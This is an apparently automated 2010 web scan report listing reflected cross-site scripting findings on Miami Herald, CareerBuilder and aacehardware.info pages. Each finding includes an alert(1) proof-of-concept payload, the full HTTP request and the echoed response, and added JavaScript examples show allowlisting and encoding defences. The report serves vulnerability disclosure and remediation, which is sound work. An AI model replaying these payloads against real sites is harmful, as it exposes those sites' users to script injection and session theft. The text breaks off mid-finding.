HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008834; Expires=Mon, 14-Nov-2011 22:32:00 GMT; Path=/ Set-Cookie: JSESSIONID=38FCB2DA207BCBB9D35AA629320C5968; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:32:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>MiamiHerald.com Search</title> <!-- No include URL entered --> < ...[SNIP]... <a class='on-page' href='/sp?aff=11097cefd'><script>alert(1)</script>08ecacb8cdf&skin=&submit=Go&keywords=&start=1'> ...[SNIP]...
The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload a29ab<script>alert(1)</script>7d509c47700 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=&aff=1109&keywords=a29ab<script>alert(1)</script>7d509c47700&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008847; Expires=Mon, 14-Nov-2011 22:32:03 GMT; Path=/ Set-Cookie: JSESSIONID=E2FDD3163D3ACCA75F1716C8CD671BE4; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:32:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f284b"><script>alert(1)</script>34bce5358bd was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=&aff=1109&keywords=f284b"><script>alert(1)</script>34bce5358bd&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008843; Expires=Mon, 14-Nov-2011 22:32:03 GMT; Path=/ Set-Cookie: JSESSIONID=4C6CA1184F2F4D6429BCFB2F707F8A1B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:32:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
2.192. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pd.miami.com
Path: /sp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8af6"><script>alert(1)</script>0b02c8bd5b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?e8af6"><script>alert(1)</script>0b02c8bd5b8=1 HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008771; Expires=Mon, 14-Nov-2011 22:31:45 GMT; Path=/ Set-Cookie: JSESSIONID=5F4E76F4A7975B2D912E6DDDABD693EC; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:31:53 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>MiamiHerald.com Search</title> <!-- No include URL entered --> < ...[SNIP]... <a href="http://pd.miami.com/sp?skin=&aff=1100&keywords=&e8af6"><script>alert(1)</script>0b02c8bd5b8=1&"> ...[SNIP]...
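The response above shows the application copying every incoming name/value pair into a link, which is why a parameter name is reflected just like a value. The following is an added example, not code from the scan report or from pd.miami.com, of rebuilding such a link from an allowlist of known parameters. The allowlist (skin, aff, keywords, submit) is an assumption drawn from the requests shown in this section, the query strings are constructed from the report's payloads, and the link template is a constructed stand-in for the `<a href="http://pd.miami.com/sp?...">` in the response.

```javascript
// Added example, not code from the scan report or from the application it
// describes: rebuilding a "next page" link from the incoming query string without
// reflecting arbitrary parameter names. ALLOWED_PARAMS is an assumption drawn from
// the requests in this section; the link template is a constructed stand-in.

const ALLOWED_PARAMS = ["skin", "aff", "keywords", "submit"];

// Constructed query strings carrying the report's payloads: one as a parameter
// name (this finding), one as the keywords value (the keywords finding above).
const NAME_ATTACK = 'skin=&aff=1100&keywords=&e8af6"><script>alert(1)</script>0b02c8bd5b8=1';
const VALUE_ATTACK = 'skin=&aff=1109&keywords=f284b"><script>alert(1)</script>34bce5358bd&submit=Go';

// Entity-encode for a double-quoted attribute value.
function encodeAttr(s) {
  return String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;")
                  .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Vulnerable shape: every pair the client sent is copied into the href verbatim.
// A parameter name is as attacker-controlled as its value.
function buildLinkUnsafe(query) {
  const pairs = [];
  for (const [name, value] of new URLSearchParams(query)) pairs.push(name + "=" + value);
  return '<a href="http://pd.miami.com/sp?' + pairs.join("&") + '&start=1">next</a>';
}

// Hardened shape: only known names are carried over, URLSearchParams percent-encodes
// names and values, and the finished URL is entity-encoded for the attribute context.
function buildLinkSafe(query) {
  const incoming = new URLSearchParams(query);
  const out = new URLSearchParams();
  for (const name of ALLOWED_PARAMS) {
    if (incoming.has(name)) out.set(name, incoming.get(name));
  }
  out.set("start", "1");
  return '<a href="' + encodeAttr("http://pd.miami.com/sp?" + out.toString()) + '">next</a>';
}

// Recover the parameters a browser would send when following the rendered link:
// take the href attribute, decode the entities, parse the URL.
function linkParams(html) {
  const m = html.match(/href="([^"]*)"/);
  const href = m ? m[1] : "";
  const decoded = href.replace(/&quot;/g, '"').replace(/&lt;/g, "<")
                      .replace(/&gt;/g, ">").replace(/&amp;/g, "&");
  return new URL(decoded).searchParams;
}
```

The allowlist removes the attacker-named parameter entirely; a payload in a known parameter's value survives only in percent-encoded form, and the server receiving the follow-up request still gets the original value back, so legitimate searches are not broken by the change.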
2.193. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pd.miami.com
Path: /sp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a68d'><script>alert(1)</script>2a247e32006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?5a68d'><script>alert(1)</script>2a247e32006=1 HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008817; Expires=Mon, 14-Nov-2011 22:31:57 GMT; Path=/ Set-Cookie: JSESSIONID=623F113F2B767DD27302847C91959B89; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:31:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>MiamiHerald.com Search</title> <!-- No include URL entered --> < ...[SNIP]... <a class='on-page' href='/sp?aff=&5a68d'><script>alert(1)</script>2a247e32006=1&5a68d'> ...[SNIP]...
The value of the skin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb94"><script>alert(1)</script>7c71531038e was submitted in the skin parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=abb94"><script>alert(1)</script>7c71531038e&aff=1109&keywords=&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008725; Expires=Mon, 14-Nov-2011 22:31:36 GMT; Path=/ Set-Cookie: JSESSIONID=5E3C42A7A8E3B1A057FB8D90D6456A77; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:31:36 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Local Directory > Miami, FL > Miami Herald</title>
The value of the skin request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1a7'><script>alert(1)</script>6a21073105a was submitted in the skin parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=bd1a7'><script>alert(1)</script>6a21073105a&aff=1109&keywords=&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: userId=293008731; Expires=Mon, 14-Nov-2011 22:31:38 GMT; Path=/ Set-Cookie: JSESSIONID=4B5FA7C0F6A9F5500F6AB02D2769F0E3; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 14 Nov 2010 22:31:38 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Local Directory > Miami, FL > Miami Herald</title>
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33483"%20a%3db%209e634a2ad91 was submitted in the lr parameter. This input was echoed as 33483" a=b 9e634a2ad91 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that attribute injection is frequently exploitable on its own: an event-handler attribute such as onmouseover runs script without any angle brackets, so removing < and > from the input does not close this finding; the value should be entity-encoded for the attribute context instead.
Request
GET /rt.ic/Florida_Miami/?lr=cbcb_mh33483"%20a%3db%209e634a2ad91&SiteID=cbcb_mh045 HTTP/1.1 Host: retail.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196457 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=4457d6fa83344a578fb8e489d659276d-343071183-XE-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650A3EF5BFA08B152085FF5EB5256808D63408F4E9A5B5C6850C79095234B5F2A3EDC57BB78FC777114; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:03 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:03 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR45 Date: Sun, 14 Nov 2010 22:33:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
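The attribute-injection case above, as an added example that is not code from the scan report or from careerbuilder.com: it contrasts a filter that only strips angle brackets with attribute encoding, and uses a small attribute tokenizer to show which attributes a browser would see. That the application strips angle brackets is an assumption made for the demonstration (the report says only that the script probe did not succeed); the script probe used here is constructed in the scanner's usual shape, and the `<a href="...">` template is a constructed stand-in for whatever tag the application emits.

```javascript
// Added example, not code from the scan report or from the application it
// describes: why a filter that only removes '<' and '>' leaves a double-quoted
// attribute value injectable, and the encoding that actually closes the hole.
// That the application strips angle brackets is an assumption for the demo.

// Payload from the finding, URL-decoded, plus a script probe in the scanner's
// usual shape (constructed). The <a href="..."> template is a constructed stand-in.
const ATTR_PAYLOAD = '33483" a=b 9e634a2ad91';
const SCRIPT_PAYLOAD = '33483"><script>alert(1)</script>9e634a2ad91';

// Assumed filter: drops angle brackets and nothing else.
function stripAngleBrackets(s) {
  return String(s).replace(/[<>]/g, "");
}

// Correct defence for a double-quoted attribute value: entity-encode the
// characters that can close the value or the tag. The quote is the critical one.
function encodeAttr(s) {
  return String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;")
                  .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

function renderFiltered(lr) {
  return '<a href="/?lr=cbcb_mh' + stripAngleBrackets(lr) + '&ff=21">Home</a>';
}

function renderEncoded(lr) {
  return '<a href="/?lr=cbcb_mh' + encodeAttr(lr) + '&ff=21">Home</a>';
}

// Names of the attributes a browser would see on the first tag of the markup.
// A small tokenizer, enough for the demonstration; not an HTML parser.
function attributeNames(html) {
  const tag = html.match(/^<[a-zA-Z][^\s>]*\s*([^>]*)>/);
  if (!tag) return [];
  const names = [];
  const re = /([^\s=\/"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let m;
  while ((m = re.exec(tag[1])) !== null) names.push(m[1]);
  return names;
}
```

With the filter in place the script probe is neutralised, which is what makes the scanner report "no full proof-of-concept", yet the attribute probe still produces a second attribute named `a` on the tag. With entity encoding the tag has exactly one attribute, href, and the payload is inert inside its value.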
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59826'-alert(1)-'b0e1b29c015 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; passing the value through a data attribute or a JSON-encoded block that the script reads at run time is the usual alternative. Where the value must be written into a string literal, it should be JavaScript-escaped for that literal (quotes, backslashes and line terminators) and the characters < and > should be escaped as well, so that a </script> sequence in the data cannot close the enclosing script element. HTML entity encoding is not a substitute here, since the HTML parser does not decode entities inside a script element.
Request
GET /rt.ic/Florida_Miami/?lr=cbcb_mh59826'-alert(1)-'b0e1b29c015&SiteID=cbcb_mh045 HTTP/1.1 Host: retail.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196717 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=cb054ad5c25e4f7c8fe17a48f1dee91c-343071214-wc-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65028A8C4478E20C154059119D0921DD53C8E8B668187685AE991E973471DDFBE77BEACC4A7A1B8CD36; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:33 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:34 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR13 Date: Sun, 14 Nov 2010 22:33:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh59826'-alert(1)-'b0e1b29c015&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b023'-alert(1)-'384c97332ed was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; passing the value through a data attribute or a JSON-encoded block that the script reads at run time is the usual alternative. Where the value must be written into a string literal, it should be JavaScript-escaped for that literal (quotes, backslashes and line terminators) and the characters < and > should be escaped as well, so that a </script> sequence in the data cannot close the enclosing script element. HTML entity encoding is not a substitute here, since the HTML parser does not decode entities inside a script element.
Request
GET /sm.ic/Florida_Miami/?lr=cbcb_mh5b023'-alert(1)-'384c97332ed&SiteID=cbcb_mh046 HTTP/1.1 Host: sales-marketing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 199874 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=1ada416b55864b70b364400fe1ec4bd2-343071233-wx-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65088C2B54C90EA381232F5A1B73A74E39F55234E2E04AEE9D9E243F37AEFDF837155E0C8F4E2A2701C; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:52 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:53 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR34 Date: Sun, 14 Nov 2010 22:33:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh5b023'-alert(1)-'384c97332ed&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71567"%20a%3db%2037dba5a01fa was submitted in the lr parameter. This input was echoed as 71567" a=b 37dba5a01fa in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sm.ic/Florida_Miami/?lr=cbcb_mh71567"%20a%3db%2037dba5a01fa&SiteID=cbcb_mh046 HTTP/1.1 Host: sales-marketing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 199294 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=2dec5cb744574f9c9598166721519d59-343071203-wq-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650B7174C4F3D987D1FF16F084FF840B84E44E723C892C16C31E97843014090580DC1E4169D092792D0; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:23 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:23 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR27 Date: Sun, 14 Nov 2010 22:33:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the fields request parameter is copied into the HTML document as plain text between tags. The payload 91cc6<script>alert(1)</script>88b28ce8f1f was submitted in the fields parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search-bin/search.pl.cgi?product=movies&live_template=http%3A%2F%2Fmovies.miami.com%2Fsearch%2Fv-sr%2Findex.html&collection=ENDECA_INDEX&fields=91cc6<script>alert(1)</script>88b28ce8f1f&preview_template=http%3A%2F%2Fmovies-preview.miami.com%2Fsearch%2Fv-sr%2Findex.html&results_per_page=500&prop_expose_refs=0&sf_movies_showtime_dt=&sf_meta_domain=www.miamiherald.com&sort=movies_theater_geocode%2Cmovies_theater_name%2Cmovies_movie_title%2Cmovies_showtime_dt&prop_geo_radius=20&sf_movies_showtimes=&sf_movies_theater_geocode=Miami&op.x=24&op.y=9&op=Search HTTP/1.1 Host: search.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:34:43 GMT Server: Apache/1.3.41 Vary: Accept-Encoding Expires: Sat, 13 Nov 2010 22:34:43 GMT Mi-app-host: rsds009p Content-Type: text/html; charset=ISO-8859-1 X-Cache: MISS from search.miami.com Connection: close Content-Length: 518
<h1>Search Error</h1> <b>Could not retrieve Error Template.</b><br> Error template: <br> error_template not set.
<p> <b>Search Error(s)</b><br> NM::Search::SEI::Connection: ERROR: Unable to parse query string: [search SOLR for 91cc6<script>alert(1)</script>88b28ce8f1f where meta_domain = "www.miamiherald.com" and meta_product = "movies" and movies_theater_geocode = "Miami" order by movies_theater_geocode,movies_theater_name,movies_movie_title,movies_showtime_dt lim ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84964"><script>alert(1)</script>ffc48037882 was submitted in the REST URL parameter 2. This input was echoed as 84964\"><script>alert(1)</script>ffc48037882 in the application's response. The backslash added by the application (addslashes-style escaping) has no meaning to the HTML parser, so the quotation mark still terminates the attribute value and the injected tag is parsed as markup.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/Special+Sales+Bear+bear84964"><script>alert(1)</script>ffc48037882/ HTTP/1.1 Host: tlight2-niqwf.aacehardware.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:31:35 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 8176
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9b547</title><script>alert(1)</script>a06a19bd24a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/Special+Sales+Bear+bear9b547</title><script>alert(1)</script>a06a19bd24a/ HTTP/1.1 Host: tlight2-niqwf.aacehardware.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:31:41 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d6e9<script>alert(1)</script>fc28cde05d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/Special+Sales+Bear+bear8d6e9<script>alert(1)</script>fc28cde05d5/ HTTP/1.1 Host: tlight2-niqwf.aacehardware.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:31:38 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65c6"><script>alert(1)</script>7d45de7dcc6 was submitted in the REST URL parameter 2. This input was echoed as c65c6\"><script>alert(1)</script>7d45de7dcc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/c65c6"><script>alert(1)</script>7d45de7dcc6/ HTTP/1.1 Host: tlight2-niqwf.aacehardware.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:31:37 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 10925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9252"%20a%3db%2073cda56ab20 was submitted in the lr parameter. This input was echoed as c9252" a=b 73cda56ab20 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?lr=cbcb_mhc9252"%20a%3db%2073cda56ab20&sc_cmp2=JS_Nav_Home&ff=21 HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 51063 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=f7f36667ce184a8cb9e94fbce6247967-343071309-wm-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6500CE4E9C78743F3D9DE8DB5BEB7FE82A6B7F1F5141E4907F897CC6AB6A78A6DED0A396D7BB9DAA4DC; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:09 GMT; path=/; HttpOnly Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/ X-Powered-By: ASP.NET X-PBY: BEAR23 Date: Sun, 14 Nov 2010 22:35:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the section request parameter is copied into the HTML document as plain text between tags. The payload e4373<script>alert(1)</script>19d07abf959 was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
